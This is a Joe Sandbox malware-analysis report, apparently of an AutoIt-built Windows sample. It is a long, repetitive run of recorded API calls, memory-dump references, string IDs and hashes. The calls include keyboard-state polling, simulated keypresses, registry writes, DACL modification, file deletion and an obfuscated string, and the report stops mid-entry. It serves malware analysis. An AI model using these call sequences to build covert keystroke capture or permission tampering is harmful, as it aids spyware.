                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  APIs
                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BE07B0
                                                    • Part of subcall function 00BC7BCC: _memmove.LIBCMT ref: 00BC7C06
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: LongNamePath_memmove
                                                  • String ID:
                                                  • API String ID: 2514874351-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __wfsopen
                                                  • String ID:
                                                  • API String ID: 197181222-0
                                                  APIs
                                                  • Sleep.KERNELBASE(000001F4), ref: 00F5C261
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307795327.0000000000F59000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F59000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_f59000_new.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00C4CB37
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C4CB95
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C4CBD6
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C4CC00
                                                  • SendMessageW.USER32 ref: 00C4CC29
                                                  • _wcsncpy.LIBCMT ref: 00C4CC95
                                                  • GetKeyState.USER32(00000011), ref: 00C4CCB6
                                                  • GetKeyState.USER32(00000009), ref: 00C4CCC3
                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00C4CCD9
                                                  • GetKeyState.USER32(00000010), ref: 00C4CCE3
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00C4CD0C
                                                  • SendMessageW.USER32 ref: 00C4CD33
                                                  • SendMessageW.USER32(?,00001030,?,00C4B348), ref: 00C4CE37
                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00C4CE4D
                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00C4CE60
                                                  • SetCapture.USER32(?), ref: 00C4CE69
                                                  • ClientToScreen.USER32(?,?), ref: 00C4CECE
                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00C4CEDB
                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C4CEF5
                                                  • ReleaseCapture.USER32 ref: 00C4CF00
                                                  • GetCursorPos.USER32(?), ref: 00C4CF3A
                                                  • ScreenToClient.USER32(?,?), ref: 00C4CF47
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C4CFA3
                                                  • SendMessageW.USER32 ref: 00C4CFD1
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C4D00E
                                                  • SendMessageW.USER32 ref: 00C4D03D
                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00C4D05E
                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00C4D06D
                                                  • GetCursorPos.USER32(?), ref: 00C4D08D
                                                  • ScreenToClient.USER32(?,?), ref: 00C4D09A
                                                  • GetParent.USER32(?), ref: 00C4D0BA
                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 00C4D123
                                                  • SendMessageW.USER32 ref: 00C4D154
                                                  • ClientToScreen.USER32(?,?), ref: 00C4D1B2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00C4D1E2
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00C4D20C
                                                  • SendMessageW.USER32 ref: 00C4D22F
                                                  • ClientToScreen.USER32(?,?), ref: 00C4D281
                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00C4D2B5
                                                    • Part of subcall function 00BC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00BC25EC
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C4D351
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                  • String ID: @GUI_DRAGID$F
                                                  • API String ID: 3977979337-4164748364
                                                  APIs
                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00C484D0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID: %d/%02d/%02d
                                                  • API String ID: 3850602802-328681919
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove$_memset
                                                  • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                  • API String ID: 1357608183-1798697756
                                                  APIs
                                                  • GetForegroundWindow.USER32(00000000,?), ref: 00BC48DF
                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00BFD665
                                                  • IsIconic.USER32(?), ref: 00BFD66E
                                                  • ShowWindow.USER32(?,00000009), ref: 00BFD67B
                                                  • SetForegroundWindow.USER32(?), ref: 00BFD685
                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BFD69B
                                                  • GetCurrentThreadId.KERNEL32 ref: 00BFD6A2
                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BFD6AE
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFD6BF
                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 00BFD6C7
                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 00BFD6CF
                                                  • SetForegroundWindow.USER32(?), ref: 00BFD6D2
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFD6E7
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BFD6F2
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFD6FC
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BFD701
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFD70A
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BFD70F
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00BFD719
                                                  • keybd_event.USER32(00000012,00000000), ref: 00BFD71E
                                                  • SetForegroundWindow.USER32(?), ref: 00BFD721
                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 00BFD748
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                  • String ID: Shell_TrayWnd
                                                  • API String ID: 4125248594-2988720461
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2C78D
                                                  • FindClose.KERNEL32(00000000), ref: 00C2C7E1
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C2C806
                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C2C81D
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C2C844
                                                  • __swprintf.LIBCMT ref: 00C2C890
                                                  • __swprintf.LIBCMT ref: 00C2C8D3
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • __swprintf.LIBCMT ref: 00C2C927
                                                    • Part of subcall function 00BE3698: __woutput_l.LIBCMT ref: 00BE36F1
                                                  • __swprintf.LIBCMT ref: 00C2C975
                                                    • Part of subcall function 00BE3698: __flsbuf.LIBCMT ref: 00BE3713
                                                    • Part of subcall function 00BE3698: __flsbuf.LIBCMT ref: 00BE372B
                                                  • __swprintf.LIBCMT ref: 00C2C9C4
                                                  • __swprintf.LIBCMT ref: 00C2CA13
                                                  • __swprintf.LIBCMT ref: 00C2CA62
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                  • API String ID: 3953360268-2428617273
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00C2EFB6
                                                  • _wcscmp.LIBCMT ref: 00C2EFCB
                                                  • _wcscmp.LIBCMT ref: 00C2EFE2
                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C2EFF4
                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00C2F00E
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2F026
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F031
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C2F04D
                                                  • _wcscmp.LIBCMT ref: 00C2F074
                                                  • _wcscmp.LIBCMT ref: 00C2F08B
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2F09D
                                                  • SetCurrentDirectoryW.KERNEL32(00C78920), ref: 00C2F0BB
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2F0C5
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F0D2
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F0E4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                  • String ID: *.*
                                                  • API String ID: 1803514871-438819550
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C40953
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C4F910,00000000,?,00000000,?,?), ref: 00C409C1
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C40A09
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C40A92
                                                  • RegCloseKey.ADVAPI32(?), ref: 00C40DB2
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C40DBF
                                                  Strings
                                                  Similarity
                                                  • API ID: Close$ConnectCreateRegistryValue
                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                  • API String ID: 536824911-966354055
                                                  • Opcode ID: cbb66053fdb19e68b7f37378e3c88a89bcea56022622f1099d4f481f9bf1526a
                                                  • Instruction ID: efe0e2600e74e9f658a64f3385bce9c3d7d57fbb01de0ed6437cb8310bca8150
                                                  • Opcode Fuzzy Hash: cbb66053fdb19e68b7f37378e3c88a89bcea56022622f1099d4f481f9bf1526a
                                                  • Instruction Fuzzy Hash: E5028E756006119FDB14EF24C885E2AB7E5FF89710F1485ACF99A9B3A2CB30ED45CB81
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00C2F113
                                                  • _wcscmp.LIBCMT ref: 00C2F128
                                                  • _wcscmp.LIBCMT ref: 00C2F13F
                                                    • Part of subcall function 00C24385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C243A0
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2F16E
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F179
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C2F195
                                                  • _wcscmp.LIBCMT ref: 00C2F1BC
                                                  • _wcscmp.LIBCMT ref: 00C2F1D3
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2F1E5
                                                  • SetCurrentDirectoryW.KERNEL32(00C78920), ref: 00C2F203
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2F20D
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F21A
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F22C
                                                  Strings
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: 3a1f3fccbe8afb18b2e273768e0f2ec964f9a976999eba601807e420be40cdf1
                                                  • Instruction ID: 60f864fde8b2a43888c7f6c94f35d7316d945d8191809b26380db4186ee76021
                                                  • Opcode Fuzzy Hash: 3a1f3fccbe8afb18b2e273768e0f2ec964f9a976999eba601807e420be40cdf1
                                                  • Instruction Fuzzy Hash: 6331B33650022DAADB249FA4FC49BEE77BCAF46360F1041B9E914A35A0DB70DF46CE54
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C2A20F
                                                  • __swprintf.LIBCMT ref: 00C2A231
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C2A26E
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C2A293
                                                  • _memset.LIBCMT ref: 00C2A2B2
                                                  • _wcsncpy.LIBCMT ref: 00C2A2EE
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C2A323
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C2A32E
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00C2A337
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C2A341
                                                  Strings
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: 7526d40cba3b771bb0a82b9766b9d05f005b20246ad2834dade7864b7facc7f5
                                                  • Instruction ID: 9f8e81c5f271eb8ab5c272bcdeeed1640ef6aa72cb3492d5114be910b6fafcce
                                                  • Opcode Fuzzy Hash: 7526d40cba3b771bb0a82b9766b9d05f005b20246ad2834dade7864b7facc7f5
                                                  • Instruction Fuzzy Hash: AC31AEB5900119ABDB21DFA0DC49FEF37BCAF89710F1040BAF608D2160EB7097458B65
                                                  APIs
                                                    • Part of subcall function 00C18202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C1821E
                                                    • Part of subcall function 00C18202: GetLastError.KERNEL32(?,00C17CE2,?,?,?), ref: 00C18228
                                                    • Part of subcall function 00C18202: GetProcessHeap.KERNEL32(00000008,?,?,00C17CE2,?,?,?), ref: 00C18237
                                                    • Part of subcall function 00C18202: HeapAlloc.KERNEL32(00000000,?,00C17CE2,?,?,?), ref: 00C1823E
                                                    • Part of subcall function 00C18202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C18255
                                                    • Part of subcall function 00C1829F: GetProcessHeap.KERNEL32(00000008,00C17CF8,00000000,00000000,?,00C17CF8,?), ref: 00C182AB
                                                    • Part of subcall function 00C1829F: HeapAlloc.KERNEL32(00000000,?,00C17CF8,?), ref: 00C182B2
                                                    • Part of subcall function 00C1829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C17CF8,?), ref: 00C182C3
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C17D13
                                                  • _memset.LIBCMT ref: 00C17D28
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C17D47
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C17D58
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C17D95
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C17DB1
                                                  • GetLengthSid.ADVAPI32(?), ref: 00C17DCE
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C17DDD
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C17DE4
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C17E05
                                                  • CopySid.ADVAPI32(00000000), ref: 00C17E0C
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C17E3D
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C17E63
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C17E77
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 9ffb62fdc0f834cb722dab0647b183e7bf5503e56a4805ac91792b74f404149d
                                                  • Instruction ID: b30b24c34fdb72694bb7abd4d3873323912b166851aa09bec287f564ace96d64
                                                  • Opcode Fuzzy Hash: 9ffb62fdc0f834cb722dab0647b183e7bf5503e56a4805ac91792b74f404149d
                                                  • Instruction Fuzzy Hash: E1616D75904109AFDF00DFA0DC44AEEBBB9FF46300F148269F825A6291DB319A56DB60
                                                  Strings
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$jdyakj0yakjcyakjcyakj2yakj8yakj9yakj4yakjdyakjfyakjcyakj5yakj7yakj5yakj6yakj8yakj9yakj6yakj5yakjfyakj4yakj8yakj3yakjeyakj4yakjfyak
                                                  • API String ID: 0-142637280
                                                  • Opcode ID: 13a50ed39ea42c00878c43c8f726580a41a29abbe96cc50c4e0230127610b715
                                                  • Instruction ID: cdd97a171d0696068bc6424b362bf905ae0c7c54ec29c6bc9c45c846aeff60cc
                                                  • Opcode Fuzzy Hash: 13a50ed39ea42c00878c43c8f726580a41a29abbe96cc50c4e0230127610b715
                                                  • Instruction Fuzzy Hash: 0F726E75E002199ADB24CF59C8807EEB7F5FF49710F1481AAE919EB390E7349A81DB90
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00C20097
                                                  • SetKeyboardState.USER32(?), ref: 00C20102
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00C20122
                                                  • GetKeyState.USER32(000000A0), ref: 00C20139
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00C20168
                                                  • GetKeyState.USER32(000000A1), ref: 00C20179
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00C201A5
                                                  • GetKeyState.USER32(00000011), ref: 00C201B3
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00C201DC
                                                  • GetKeyState.USER32(00000012), ref: 00C201EA
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00C20213
                                                  • GetKeyState.USER32(0000005B), ref: 00C20221
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: d152a5df904b8293c5b7c12f18c15c9eda4ee01d71b89a0aa6d10818043d65ce
                                                  • Instruction ID: 7fcef187f222540e1b3196b427aa095fc54d39d9f2b7ff56de0938dda3a1a899
                                                  • Opcode Fuzzy Hash: d152a5df904b8293c5b7c12f18c15c9eda4ee01d71b89a0aa6d10818043d65ce
                                                  • Instruction Fuzzy Hash: 1D5109309047A829FB35DBA0A8547EEBFB49F01380F18459FC9D2569C3DAA49B8CC761
                                                  APIs
                                                    • Part of subcall function 00C40E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3FDAD,?,?), ref: 00C40E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C404AC
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C4054B
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C405E3
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C40822
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C4082F
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: 3e99c2765b63a274f93262fc6b3a16bb6ee2e99328e278ac8f3795260cd9ece4
                                                  • Instruction ID: 3fad3d0ca6341af97dc19a63ae5ed400c935aba75d9501319c01d9dcb9f7a95f
                                                  • Opcode Fuzzy Hash: 3e99c2765b63a274f93262fc6b3a16bb6ee2e99328e278ac8f3795260cd9ece4
                                                  • Instruction Fuzzy Hash: 6FE17F31604204AFCB14DF24C895E6ABBE5FF89714F14856DF95ADB2A2DB30ED01CB91
                                                  APIs
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: afad4d6db7be8ae041dd86c84f121e37dad996b72e819d512cff0fca296fd929
                                                  • Instruction ID: baf9196051a44cf5f28d9be221aa5e5bc8cbc9308f7c7e257541ae5720544838
                                                  • Opcode Fuzzy Hash: afad4d6db7be8ae041dd86c84f121e37dad996b72e819d512cff0fca296fd929
                                                  • Instruction Fuzzy Hash: 6821A1392006109FDB14AF24DC19BAE7BA8FF06751F11806DF946DB2A1DB70AD41CB54
                                                  APIs
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                    • Part of subcall function 00C24A31: GetFileAttributesW.KERNEL32(?,00C2370B), ref: 00C24A32
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C238A3
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C2394B
                                                  • MoveFileW.KERNEL32(?,?), ref: 00C2395E
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C2397B
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2399D
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C239B9
                                                  Strings
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 390eed6cf4dc75d37168e1e5293479a2f475d0772d9230ef60b05741b292c82d
                                                  • Instruction ID: adcaee630a32401b16292b55c429770a1fb2c29d2ea0cba1431b348333ff9a7a
                                                  • Opcode Fuzzy Hash: 390eed6cf4dc75d37168e1e5293479a2f475d0772d9230ef60b05741b292c82d
                                                  • Instruction Fuzzy Hash: F051903180519CAACF15FBA0E992EEDB7B9AF15300F6000ADE41677191EF756F49CB60
                                                  APIs
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C2F440
                                                  • Sleep.KERNEL32(0000000A), ref: 00C2F470
                                                  • _wcscmp.LIBCMT ref: 00C2F484
                                                  • _wcscmp.LIBCMT ref: 00C2F49F
                                                  • FindNextFileW.KERNEL32(?,?), ref: 00C2F53D
                                                  • FindClose.KERNEL32(00000000), ref: 00C2F553
                                                  Strings
                                                  Similarity
